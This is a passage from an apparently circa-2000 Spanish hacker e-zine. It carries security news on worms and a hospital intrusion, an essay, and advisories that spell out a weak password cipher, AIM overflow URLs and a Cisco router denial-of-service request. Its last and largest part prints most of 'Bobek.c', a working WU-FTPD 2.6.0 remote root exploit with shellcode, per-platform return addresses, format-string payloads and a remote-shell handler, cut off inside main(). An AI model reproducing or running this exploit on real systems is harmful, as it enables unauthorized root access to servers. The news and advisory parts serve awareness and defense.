innovacion: es el caso de "Energy", un gusano de laboratorio muy peculiar,pero
con escasas posibilidades de llegar a encontrarse"en libertad"(`in the wild´).

La causa que evidencia la baja probabilidad de llegar a dar con el gusano
"Energy" en un ordenador infectado es precisamente su gran y mas importante
caracteristica: la innovadora capacidad que tiene de introducirse en archivos
comprimidos de tipo RAR, sin que el usuario que los esta mandando se percate
de ello. Ademas hay que sumar otro importante factor a sus limitaciones de
expansion, ya que "Energy" esta diseñado para ejecutarse como un servicio NT,
restringiendo su campo de accion a sistemas Windows NT y 2000.




"Santa": los gusanos hacen su agosto en navidad
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Siguiendo con la tradicion navideña,y sin haber entrado todavia de lleno en la
euforia festival propia de esta epoca, virus, gusanos y demas generos de
"malware" siguen aprovechando el tiron, abusando de la excesiva confianza de
algunos usuarios; tras el impacto causado por "Navidad", uno de los "i-worms"
mas recientes, acaba de aparecer "Santa", un gusano de Internet que,
afortunadamente, no contiene ningun tipo de carga dañina o destructiva.

Siguiendo los exitosos pasos de otros especimenes de caracteristicas similares
como "I love you", este patogeno esta programado en VBS(`Visual Basic Script´)
un lenguaje de "script" puesto por Microsoft a disposicion de todos los
usuarios de Windows-e instalado por defecto en todas las configuraciones desde
hace dos años- con el fin de facilitar la automatizacion de ciertas tareas
tediosas (cuando menos, a priori), como, por ejemplo, la impresion de varios
ficheros, los accesos a determinados valores del registro de configuraciones,
o el envio de un numero elevado de mensajes de correo electronico a diversas
direcciones.




CriptoRed cumple un año
^^^^^^^^^^^^^^^^^^^^^^^
El 1 de diciembre de 1999 comenzaba su andadura en Internet la Red Tematica
Iberoamericana de Criptografia y Seguridad de la Informacion, CriptoRed
<http://www.criptored.upm.es>

En este primer año dedicado casi exclusivamente a formar un nucleo de expertos
docentes universitarios, investigadores y destacados profesionales de empresas
en el sector de las TICs y la seguridad informatica, el balance no puede ser
mas positivo:

156 miembros que pertenecen a:
57 Universidades de 10 paises (35 de España)
2 Centros de Investigacion (CSIC y CINVESTAV)
2 Camaras de Comercio Electronico
22 empresas y organismos del sector




El gusano "Req" roba informacion de un banco de Suiza
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Recientemente, en medio de una oleada virica que ha dejado tras su paso una
considerable cantidad de nuevos gusanos (`i-worms´), ha aparecido "Req", un
especimen que, una vez ejecutado en una maquina remota, roba documentos
generados por un programa del Union Bank de Suiza, en caso de existir, y los
envia al autor del "malware".

Se trata de un gusano programado en lenguaje VBS (`Visual Basic Script´), al
igual que otros mas famosos como "I love you". Este especimen es capaz de
funcionar solo en aquellos ordenadores en los que se haya instalado una copia
de la version comercial de Microsoft Outlook, que es el programa que emplea
como pasarela para poder enviarse a otras direcciones de correo electronico
y proseguir asi su ciclo reproductor a traves de la Red.

CyberPatrol no protege el envio de datos sensibles 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
CyberPatrol, el software para el control de contenidos durante la navegacion
por Internet, permite registrar el programa a traves de un formulario que
incluye en su version de demostracion. Los datos recogidos para proceder al
pago y registro de la aplicacion son enviados a su servidor en texto claro,
con la excepcion del numero de tarjeta de credito, que intentan proteger en
vano con un simple cifrado por sustitucion facil de invertir.

En vez de utilizar una sesion segura para el envio de informacion
a su servidor, SSL por ejemplo, CyberPatrol utiliza el metodo POST a traves de
una conexion HTTP normal, con lo que los datos viajan por la Red sin ninguna
proteccion.

La informacion facilitada por parte del usuario en el registro, tal como
direccion de correo, domicilio, o la fecha de expiracion de la tarjeta, viaja
sin ningun tipo de cifrado, al alcance de cualquiera que intercepte la
comunicacion. En el caso del numero de la tarjeta de credito utiliza un
sencillo metodo de sustitucion de los digitos por otros caracteres segun la
siguiente tabla:

0=z, 1={, 2=x, 3=y, 4=%7E, 5=., 6=|, 7=}, 8=r, 9=s

Alguien que intercepte la comunicacion podra realizar la operacion inversa
para conseguir el numero de la tarjeta de credito.




El virus "Doser" bombardea varios servidores de Internet
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Tras la aparicion de "Hortiga", un especimen capaz de emplear los ordenadores
infectados como servidores proxy a traves de los cuales seria posible llevar a
cabo cualquier tipo de accion de manera completamente impune, acaba de salir a
la luz"Doser",un patogeno cuya mision consiste en bombardear varios servidores
de Internet utilizando maquinas infectadas como "esclavos".

Programado en ensamblador y capaz de funcionar en sistemas Win32 ( 95, 98, ME,
NT, 2000, CE), este virus polimorfico, relacionado con la familia "AOC", una
serie anterior de especimenes muy similares en cuanto a estructura y codigo
con "Doser", no presenta ninguna cualidad tecnica reseñable, salvo la
capacidad ya comentada de lanzar ataques contra diversos servidores de
Internet.




Intrusion en los sistemas de un hospital
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Datos de mas de 5.000 pacientes fueron copiados desde los sistemas del
Washington Medical Center, el mayor hospital universitario de Seattle.Un hecho
que hubiera pasado desapercibido de no ser por el aviso del intruso a
determinados foros de seguridad. ¿Se trata de un caso aislado? ¿Son adecuadas
las medidas adoptadas por los centros sanitarios¿Esta nuestra historia clinica
al alcance de cualquiera?

El intruso, apodado "Kane", aprovecho algunas vulnerabilidades en el servidor
del departamento de patologia del hospital para realizar su primera incursion.
Una vez dentro de este servidor,instalo "sniffers" para escuchar el trafico de
la red y conseguir asi los nombres de usuarios y contraseñas del personal del
hospital. Gracias a estas credenciales pudo acceder a miles de ficheros en los
departamentos de cardiologia y rehabilitacion.

Segun fuentes del propio hospital, se tuvieron sospechas de la intrusion a
finales del verano pasado,pero se desconocia el alcance real del incidente. El
anuncio de "Kane" a determinados foros de seguridad, entre ellos SecurityFocus
y el envio de algunos ficheros sensibles como muestra de lo ocurrido, termino
por alertar a los responsables del hospital que denunciaron el hecho al FBI.

En estos momentos todo sigue su cauce previsible:el hospital resta importancia
al hecho, argumentando que tan solo estuvieron expuestos datos administrativos
y estudios de investigacion, no asi la historia clinica de sus pacientes.Desde
los foros de seguridad se habla de la etica hacker y de que la unica intencion
de "Kane" era avisar de las vulnerabilidades descubiertas, y en ningun caso
dañar el sistema o aprovecharse de la informacion obtenida. Por ultimo, el FBI
intenta encontrar el origen de la intrusion, que segun los primeros indicios
apuntan a Europa.


Autor : EleKtr0
Titulo : UnderNews
Fuentes : www.linux-chile.org // www.hispasec.com








,øñ°`´°ñø¸
-<[ 15 ]>-
`°ñø,¸,øñ°


Autor : El Editor
Titulo : ZZZZzzzzzzZZZZZzzzzZZZZZzzzz!
Comentario: No duermas mas y atrevete a mandar tu articulo, que no te preocupe
el nivel del contenido solo haslo! y participa en esta nueva aventura, tambien y
de paso dare el aviso de alguien que se quiera ofrecer en la creacion de logos,
banner`s publicitarios, gif`s animados, etc... Manden sus dudas, comentarios,
articulos, preguntas, criticas, logos, dinero, etc, etc, a:

- est@electron-team.com
- electron_team@usa.net
- www.electron-team.com
- www.electron-team.subnet.dk

Contenido : Aqui debiera ir tu sabiduria... y esfuerzo!








,øñ°`´°ñø¸
-<[ 16 ]>-
`°ñø,¸,øñ°

Autor : Eduardo Donoso
Titulo : Comentarios, Reflexiones, Criticas!
Contenido : El mundo es un pañuelo dicen, pero que si el universo fuera un
pañuelo, un pañuelo de infinitas dimensiones, de infinitos colores y matices,
de infinitos pliegues y cada ser, cada cosa, cada pequeño pensamiento fuera
uno de esos pliegues. Que sentido tendria de hablar de soledad si cada
movimiento de nuestro cuerpo, de nuestra mente, de nuestro sentir interfiriera
con todos los pliegues. Suena bonito,suena poetico y nos da un bella vision de
la existencia.

Algunos diran son solo palabras, la realidad es distinta, es lo que nos da la
ciencia y la religion, es lo que nos da el mercado y la ley, es lo que dirige
nuestras vidas, pero aun asi, aun cuando nuestra mente entienda lo anterior
sigue siendo un pensamiento bello, sigue adentro de nosotros molestando con su
sensacion de agrado, generando preguntas que la ciencia ya no puede responder,
ni el mercado, ni la ley ni la religion.

Algo dentro de nosotros busca comunion, nos dicen que todos estamos conectados
por las tramas de los ecosistemas, por las leyes del hombre y del mercado, por
el amor de los dioses, pero no siguen tratando y manejando como individuos, es
obvio no se puede controlar a una comunidad y menos si esta representa la
existencia plena. Nos dejamos llevar por una idea de ser utiles a una sociedad
sociedad que creamos nosotros para servirnos, por un mercado que da las pautas
de valorizacion de todo, cuando cuestionamos sus leyes nos dicen " asi es el
mercado"
y lo dicen como si fuera algo inmutable, como si nos haya sido
entregado por el dios libre mercado y nosotros estuvieramos condenados a
seguir sus designios. Cuando gritamos por cambios,nos muestran imagenes añejas
del cadaver del comunismo, como la opcion. Y quien recuerda que las bases del
liberalismo las dieron Hubbes y Comtte,que su base era que el pueblo no tomara
parte en las decisiones y estas solo estuvieran a cargo de los expertos, donde
quedo la libertad ?.

Quien recuerda que las leyes del mercado estan dadas por el hombre, por su
voluntad e intelecto y no por una condicion natural imposible de contradecir.
Quien se ha dado cuenta que somos cada vez mas inteligentes,lo podemos ver por
todos lados y aun seguimos creyendo que las cosas malas del mercado son
males necesarios. Bueno si queremos buenos margenes de ganancia bajo este
sistema la pobreza se hace imprescindible. Hablan de que si fueramos contra el
mercado el hambre nos asolaria, pero quien habla sobre una produccion de
alimentos, que en estos momentos es capaz de alimentar de sobra a toda la
especie humana y mas,y que la mitad de eso se pierde como basura gracias a las
especulaciones del mercado. Nadie recuerda porque cada uno esta solo y cuando
se esta solo, el instinto aflora y cada uno de nosotros representa a nuestra
especie,y esa es la mayor fuerza que nos motiva,consiente o inconscientemente,
salvar la especie. Cuando nos enseñan que la competencia es un estado natural
del hombre, que es la conducta primaria de nuestra especie,se cuestionan acaso
el hecho de que la misma enseñanza, las comunicaciones e incluso el mismo
mercado es una forma de cooperacion, que contradice las leyes que sustentan la
fe casi religiosa en el mercado.

Y la comunion donde queda entre todas las ideas que estan arriba, esa conexion
con el resto del universo por que sigue ardiendo dentro de nosotros, esa
necesidad de encontrar algo superior, ya sea a traves de la ciencia, de la
religion o de fundirse en la naturaleza. Por que cuando salimos a la montaña o
vemos el mar en una playa solitaria, algo nos reconforta, como si una mano
estuviera sobre nuestro hombro y supiera lo que pesamos y lo que sentimos.

Por que seguimos tratando de torturarnos con una concepcion de soledad, que
adentro de nosotros sabemos que es real, que no hay nada que hagamos que no
afecte a otro ser, desde respirar hasta tener hijos. Por que dejar las cosas
que estan mal asi, si cada uno puede crear un microscopico pliegue en el
pañuelo para que mejoren, no es necesario dar una lista de acciones, cada uno
sabe lo que tiene que hacer, no hay religion, partido politico, corriente
filosofica, pagina Web que nos tenga que decir nada. Hay una voz dentro de
nosotros que no solo nos habla, tambien escucha a todo el resto.Nosotros somos
el mercado, aunque para el solo seamos consumidores y oferentes,nosotros somos
las iglesias, aunque solo seamos adoradores, nosotros le entreguemos nuestra
responsabilidad y poder de decision a los politicos. Y todo eso lo podemos
cambiar, cada dia somos mas capaces de hacerlo, porque quieran o no cada dias
estamos mas conectados, ya sea por la television, la radio, el Web, etc.

Cada dia el mismo mercado nos dice que le demos mas tiempo a nuestra felicidad,
cada dia la ciencia busca respuestas en lugares donde no hay nada que medir. Y
lo unico que tenemos que hacer es escucharnos a nosotros mismos y actuar, solo
un pequeño pliegue en un pañuelo y la vida sera mejor.

Autor : Eduardo Donoso
Titulo : Comentarios, Reflexiones, Criticas!






,øñ°`´°ñø¸
-<[ 17 ]>-
`°ñø,¸,øñ°


Autor : EleKtr0
Titulo : Bug`s & Exploit`s
Fuente : www.hispasec.com // www.hack.co.za


Check Point publica el Servivice Pack 3 para Firewall-1
=======================================================
Check Point distribuye un nuevo Service Pack debido a la existencia de una
vulnerabilidad en FireWall-1 4.1 SP2 que posibilita a un atacante establecer
conexiones a traves del firewall que bloqueen servicios TCP.

El Service Pack 3 se publica para cubrir una nueva vulnerabilidad en relacion
con paquetes TCP fragmentados asociados con el uso de la opcion de Modo Rapido
(Fast Mode) para servicios TCP individuales. Hay que hacer notar que el Modo
Rapido,Fast Mode,es sinonimo de "Fastpaht" en la interfaz grafica del producto

Segun analiza Check Point las mejoras realizadas en el rendimiento de las
ultimas versiones deVPN-1/FireWall-1 permiten eliminar la necesidad de emplear
la opcion de Modo Rapido, por lo que sera eliminada en la siguiente version
mayor del producto.

El problema se produce cuando esta habilitado el Modo Rapido en cualquiera de
las reglas y puede permitir a un atacante que conozca o pueda descubrir la
direccion de una maquina protegida realizar conexiones no autorizadas a dicho
servidor. Para ello, el usuario malicioso debera enviar una serie de paquetes
TCP fragmentados especialmente creados.

Para mantener los niveles de seguridad y rendimiento adecuados, Check Point
recomienda a los usuarios de VPN-1/FireWall-1 version 4.1 la actualizacion con
el Service Pack 3. Si se dispone de VPN-1/FireWall-1 version 4.0 debera
actualizarse con el SP8 que se publicara el 31 de diciembre de 2000.En caso de
que no sea posible actualizar el firewall se recomienda desactivar el Modo
Rapido en todas las reglas en que se emplee.

Check Point: http://www.checkpoint.com/techsupport/alerts/fastmode.html




Vulnerabilidades en AOL Instant Messenger
=========================================
Se ha descubierto la existencia de multiples vulnerabilidades de
desbordamiento de bufer en el cliente de mensajeria instantanea de AOL que
pueden dar lugar a la ejecucion de codigo en la maquina atacada.

El problema se agrava al no ser necesario que este programa este en ejecucion
sino que basta con haberlo instalado para que el sistema sea vulnerable.

AOL Instant Messenger (AIM) se ha convertido, junto con ICQ, en el cliente mas
popular de mensajeria instantanea con mas de 64 millones de usuarios en todo
el mundo. Una de las causas que ha popularizado su difusion ha sido la
inclusion por defecto dentro de las distribuciones del navegador Netscape
Communicator, aparte de estar disponible para su descarga como producto
independiente.

Pero esta conocida aplicacion posee una vulnerabilidad que podria ser empleada
por un atacante para lograr la ejecucion de codigo malicioso y por extension
conseguir el control de la maquina atacada. El problema se agrava al no ser
necesario que AOL Instant Messenger este en ejecucion para lograr reproducir
el problema, basta con que este cliente se haya instalado anteriormente para
que el ordenador pueda ser comprometido.

Al realizar la instalacion de AOL Instant Messenger tambien se registra el
protocolo URL "aim:" y se trata como un ejecutable. Esto permite que los
usuarios del cliente de mensajeria puedan publicar su nombre en AOL en una
pagina web y que de esta forma otros usuarios puedan incluirlo en su agenda
("Buddy List") con solo pulsar en un enlace.

Para que esto sea posible cada url "aim://" se pasa directamente al cliente de
AOL como si se tratara de una linea de comando con distintos parametros. Por
ejemplo, si se escribe en un navegador:

"aim:goim?Screenname=usuario&Message=Hola"

se abrira una caja de mensaje preparada para enviarlo al usuario indicado.

Desafortunadamente, el cliente AOL tiene numerosas vulnerabilidades que pueden
permitir la creacion de URLs maliciosas que desborden el bufer interno del
programa, y de esta forma obtener el control del programa e incluso lograr la
ejecucion de codigo.Algunos de los desbordamientos de bufer quedan demostrados
si se escribe en un navegador las siguientes urls:

"aim:goim?=+-restart"
"aim:buddyicon?screenname=abob&groupname=asdf&Src=http://localhost/AA(..3000 caracteres)AA".

Para remediar este problema AOL ha publicado una nueva version de Instant
Messenger. Por lo que desde Hispasec recomendamos a todos los usuarios de este
programa actualizarse a la version 4.3.2229 en la cual ya se han corregido los
problemas descritos.

AOL Instant Messenger: http://www.aol.com/aim/home.html




Debil cifrado de contraseñas en los clientes de FTP de CoffeeCup
================================================================
Los dos clientes de FTP de CoffeeCup, el CoffeeCup Direct FTP y el CoffeeCup
Free FTP, utilizan un algoritmo propietario de cifrado de contraseñas que,como
cabe esperar, resulta ser bastante debil.

El fichero C:\Program Files\CoffeeCup Software\Free FTP\FTPServers.ini existe
una entrada que almacena la configuracion de cada uno de los servidores de FTP
incluida su contraseña de acceso.

El algoritmo de cifrado es sencillo pero interesante. El algoritmo de
descifrado asociado es:

D(c1c2c3c4c5c6c7c8.....c2n-1c2n) = = ASCII(0x(c3c4-c1c2))ASCII(0x(c5c6-c1c2))...ASCII(0xc(2n-1c2n-c1c2))

(Observese que cualquier contraseña se codifica con un numero par de caracteres)

Por ejemplo: D(1444)=D(1E4E)=D(1040)=D(0B3B)=ASCII(0x30)=ASCII(48)=0

Por tanto, hay 256 cifrados diferentes para cada contraseña dada, dependiendo
de cual sea el valor inicial (c1c2) que el algoritmo seleccione.

Otro ejemplo seria: D(1182887683858A) = = ASCII(0x82-11)ASCII(0x88-11)ASCII(0x76-11)ASCII(0x83-11)
ASCII(0x85-11)ASCII(0x8A-11) = = ASCII(0x71)ASCII(0x77)ASCII(0x65)ASCII(0x72)ASCII(0x74)
ASCII(0x79) = = qwerty

Recomendamos a los usuarios de estos dos programas que se abstengan de guardar
informacion confidencial sobre servidores de ftp no anonimos, puesto que
cualquier persona que tenga acceso de lectura al fichero FTPServers.ini podra
recuperarla sin ninguna dificultad.

CoffeeCup Software: http://www.coffeecup.com

Debil sistema de cifrado en WS_FTP: http://www.hispasec.com/unaaldia.asp?id=274

Descifrado de WS_FTP Pro 6.0 en linea: http://www.hispasec.com/wsftp.asp




Denegacion de servicios en la familia de routers Cisco 600
==========================================================
Existe una vulnerabilidad en la familia de routers DSL 600 de Cisco con
sistema operativo CBOS anteriores a la version 2.3.8, por la cual un usuario
malicioso podra provocar un ataque de denegacion de servicios contra el router

Para hacer posible este tipo de ataque sera necesario tener habilitada la
posibilidad de acministracion del router a traves del interfaz de
administracion web. El atacante realizara una llamada HTTP construida de forma
maliciosa mediante Telnet al router. Una vez conectado con el interfaz de
administracion web, el atacante realizara una llamada tipo "GET ? \n \n" esto
producira el cierre de la sesion Telnet y la caida del router.

Para recuperar el correcto funcionamiento del dispositivo sera necesario
realizar un nuevo ciclo de apagado y encendido. Actualmente, la unica solucion
disponible es desactivar el Interfaz de Administracion Web del Router, para
ello se deberan introducir los siguientes comandos:

cbos# set web disabled
cbos# write
cbos# reboot

Existen otras vulnerabilidades de denegacion de servicios que afectan a toda
la familia 600 de enrutadores de Cisco. El router se vera afectado de forma
similar a la descrita anteriormente cuando reciba una cadena de paquetes TCP
SYN o con el envio de paquetes ICMP ECHO (ping) de gran tamaño. En general
Cisco recomienda proceder a la actualizacion del sistema operativo del router
para evitar todos estos problemas.



*******************************************************
* *
* Nombre : Bobek.c *
* Sistema : Linux *
* Tipo : Remoto *
* Daemon : ftpd *
* *
*******************************************************
/*
* (c) 2000 venglin / b0f
* http://b0f.freebsd.lublin.pl
*
* WUFTPD 2.6.0 REMOTE ROOT EXPLOIT (22/06/2000, updated: 05/08/2000)
*
* Idea and preliminary version of exploit by tf8
*
* Greetz: Lam3rZ, TESO, ADM, lcamtuf, karpio.
* Dedicated to ksm.
*
* **PRIVATE**DO*NOT*DISTRIBUTE**
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>


#define repln if (getreply(0) < 0) return -1
#define replv if (getreply(1) < 0) return -1

#ifdef DEBUG
#define repl replv
#else
#define repl repln
#endif

char usage[] = "usage: bobek [-l login] [-o port] [-f retofs] [-s retlocofs]\n\t<-t type> <hostname>";
char recvbuf[BUFSIZ], sendbuf[BUFSIZ];
FILE *cin, *cout;

char linuxcode[]= /* Lam3rZ chroot() code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27\xcd"
"\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
"\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e"
"\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09"
"\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88"
"\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31"
"\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30\x62\x69\x6e"
"\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x69"
"\x6e\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x65"
"\x2e\x63\x6f\x6d";

char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\x01\x53\x53\xb0\x88"
"\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80\x31"
"\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31"
"\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75\xf1"
"\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd\x80"
"\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53\x53"
"\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\x30\x62\x69\x6e\x30"
"\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x69\x6e"
"\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x65\x2e"
"\x63\x6f\x6d";

struct platforms
{
char *os;
char *version;
char *code;
int align;
int eipoff;
long ret;
long retloc;
int sleep;
};

struct platforms targ[] =
{
{ "FreeBSD 3.4-STABLE", "2.6.0-ports", bsdcode, 2, 1024, 0x80b1f10, 0xbfbfcc04, 0 },
{ "FreeBSD 5.0-CURRENT", "2.6.0-ports", bsdcode, 2, 1024, 0x80b1510, 0xbfbfec0c, 0 },
{ "FreeBSD 3.4-STABLE", "2.6.0-packages", bsdcode, 2, 1024, 0x80b1510, 0xbfbfe798, 0 },
{ "FreeBSD 3.4-STABLE", "2.6.0-venglin", bsdcode, 2, 1024, 0x807078c, 0xbfbfcc04, 0 },
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf74, 0 },
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd074, 0 },
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf84, 0 },
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd04c, 0 },
{ "RedHat Linux 6.2-SMP", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd0e4, 0 },
{ NULL, NULL, NULL, 0, 0, 0, 0 }
};

long getip(name)
char *name;
{
struct hostent *hp;
long ip;
extern int h_errno;

if ((ip = inet_addr(name)) < 0)
{
if (!(hp = gethostbyname(name)))
{
fprintf(stderr, "gethostbyname(): %s\n",
strerror(h_errno));
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}

return ip;
}

int connecttoftp(host, port)
char *host;
int port;
{
int sockfd;
struct sockaddr_in cli;

bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_addr.s_addr=getip(host);
cli.sin_port = htons(port);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
return -1;
}

if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
close(sockfd);
return -1;
}

cin = fdopen(sockfd, "r");
cout = fdopen(sockfd, "w");

if (!cin || !cout)
{
close(sockfd);
return -1;
}

return sockfd;
}

int command(const char *fmt, ...)
{
char buf1[BUFSIZ], buf2[BUFSIZ*2], *p, *q;

va_list args;

if (!cout)
return -1;

bzero(buf1, BUFSIZ);
bzero(buf2, BUFSIZ*2);

va_start(args, fmt);
vsnprintf(buf1, BUFSIZ, fmt, args);
va_end(args);

for (p=buf1,q=buf2;*p;p++,q++)
{
if (*p == '\xff')
{
*q++ = '\xff';
*q = '\xff';
}
else
*q = *p;
}

fprintf(cout, "%s", buf2);

#ifdef DEBUG
fprintf(stderr, "--> ");
fprintf(stderr, "%s", buf2);
fputc('\n', stderr);
#endif

fputs("\r\n", cout);
(void)fflush(cout);
return 0;
}

int getreply(v)
int v;
{
if (!(fgets(recvbuf, BUFSIZ, cin)))
return -1;

if (v)
fprintf(stderr, "<-- %s", recvbuf);

return 0;
}

int logintoftp(login, passwd)
char *login, *passwd;
{
do
repl;
while (strncmp(recvbuf, "220 ", 4));

if ((command("USER %s", login)) < 0)
return -1;

repl;

if (strncmp(recvbuf, "331", 3))
{
puts(recvbuf);
return -1;
}

if ((command("PASS %s", passwd) < 0))
return -1;

do
repl;
while (strncmp(recvbuf, "230 ", 4));

return 0;
}

int checkvuln(void)
{
command("SITE EXEC %%p");
repl;

if(strncmp(recvbuf, "200-", 4))
return -1;

if(strncmp(recvbuf+4, "0x", 2))
return -1;

repl;

return 0;
}

int findeip(eipoff, align)
int eipoff, align;
{
int i, j, off;
char *p1;
char eip1[10], eip2[10];

for (i=eipoff;;i+=8)
{
fprintf(stderr, "at offset %d\n", i);
strcpy(sendbuf, "SITE EXEC ");

for (j=0;j<align;j++) strcat(sendbuf, "a");
strcat(sendbuf, "abcd");

for (j=0;j<eipoff/8;j++) strcat(sendbuf, "%%.f");
for (j=0;j<(i-eipoff)/8;j++) strcat(sendbuf, "%%d%%d");
strcat(sendbuf, "|%%.8x|%%.8x");

if (command(sendbuf) < 0)
return -1;

repl;

if (!(p1 = strchr(recvbuf, '|')))
return -1;

strncpy(eip1, p1+1, 8);
strncpy(eip2, p1+10, 8);

eip1[8] = eip2[8] = '\0';

if (!(strcmp(eip1, "64636261")))
{
off = i;
break;
}

if (!(strcmp(eip2, "64636261")))
{
off = i + 4;
break;
}

repl;
}

repl;

return off;
}

char *putshell(type)
int type;
{
static char buf[400];
int noplen;

char *code = targ[type].code;

noplen = sizeof(buf) - strlen(code) - 2;

memset(buf, 0x90, noplen);
buf[noplen+1] = '\0';
strcat(buf, code);

return buf;
}

int overwrite(ptr, off, align, retloc, eipoff)
long ptr, retloc;
int off, align, eipoff;
{
int i, size = 0;
char buf[100];

fprintf(stderr, "RET: %p, RET location: %p,"
" RET location offset on stack: %d\n",
(void *)ptr, (void *)retloc, off);

if (off >= 12)
{

strcpy(sendbuf, "SITE EXEC ");

for (i=0;i<eipoff/8;i++) strcat(sendbuf, "%%.f");
for (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, "%%d%%d");

if (((off-eipoff-8) % 8) != 0) strcat(sendbuf, "%%d%%d");

if (command(sendbuf) < 0)
return -1;

repl;

size = strlen(recvbuf+4) - 2;

repl;
}

fprintf(stderr, "Reply size: %d, New RET: %p\n", size,
(void *)(ptr-size));

strcpy(sendbuf, "SITE EXEC ");
for (i=0;i<align;i++) strcat(sendbuf, "a");

sprintf(buf, "%c%c%c%c", ((int)retloc & 0xff),
(((int)retloc & 0xff00) >> 8),
(((int)retloc & 0xff0000) >> 16),
(((int)retloc & 0xff000000) >> 24));

strcat(sendbuf, buf);

for (i=0;i<eipoff/8;i++) strcat(sendbuf, "%%.f");
for (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, "%%d%%d");

if (((off-eipoff-8) % 8) != 0) strcat(sendbuf, "%%d%%d");

strcat(sendbuf, "%%.");
sprintf(buf, "%d", (int)ptr-size);
strcat(sendbuf, buf);
strcat(sendbuf, "d%%n");

if (command(sendbuf) < 0)
return -1;

return 0;
}

int sh(sockfd)
int sockfd;
{
char buf[BUFSIZ];
int c;
fd_set rf, drugi;
char cmd[] = "uname -a ; pwd ; id\n";

FD_ZERO(&rf);
FD_SET(0, &rf);
FD_SET(sockfd, &rf);
write(sockfd, cmd, strlen(cmd));

while (1)
{
bzero(buf, BUFSIZ);
memcpy (&drugi, &rf, sizeof(rf));
select(sockfd+1, &drugi, NULL, NULL, NULL);
if (FD_ISSET(0, &drugi))
{
c = read(0, buf, BUFSIZ);
send(sockfd, buf, c, 0x4);
}

if (FD_ISSET(sockfd, &drugi))
{
c = read(sockfd, buf, BUFSIZ);
if (c<0) return 0;
write(1,buf,c);
}
}
}

int main(argc, argv)
int argc;
char **argv;
{
extern int optind, opterr;
extern char *optarg;
int ch, type, port, eipoff, fd, retofs, retlocofs, align, i, retoff;
long ret, retloc;
char login[BUFSIZ], password[BUFSIZ];

opterr = retofs = retlocofs = 0;
strcpy(login, "ftp");
type = -1;
port = 21;

while ((ch = getopt(argc, argv, "l:f:s:t:o")) != -1)
switch((char)ch)
{
case 'l':
strcpy(login, optarg);
break;

case 't':
type = atoi(optarg);
break;

case 'o':
port = atoi(optarg);
break;

case 'f':
retofs = atoi(optarg);
break;

case 's':
retlocofs = atoi(optarg);
break;

case '?':
default:
puts(usage);
exit(0);
}

argc -= optind;
argv += optind;

fprintf(stderr, "PanBobek v1.1 by venglin@freebsd.lublin.pl\n\n");

if (type < 0)
{
fprintf(stderr, "Please select platform:\n");
for (i=0;targ[i].os;i++)
{
fprintf(stderr, "\t-t %d : %s %s (%p / %p)\n", i,
targ[i].os, targ[i].version,
(void *)targ[i].ret,
(void *)targ[i].retloc);
}
exit(0);
}

fprintf(stderr, "Selected platform: %s with WUFTPD %s\n\n",
targ[type].os, targ[type].version);

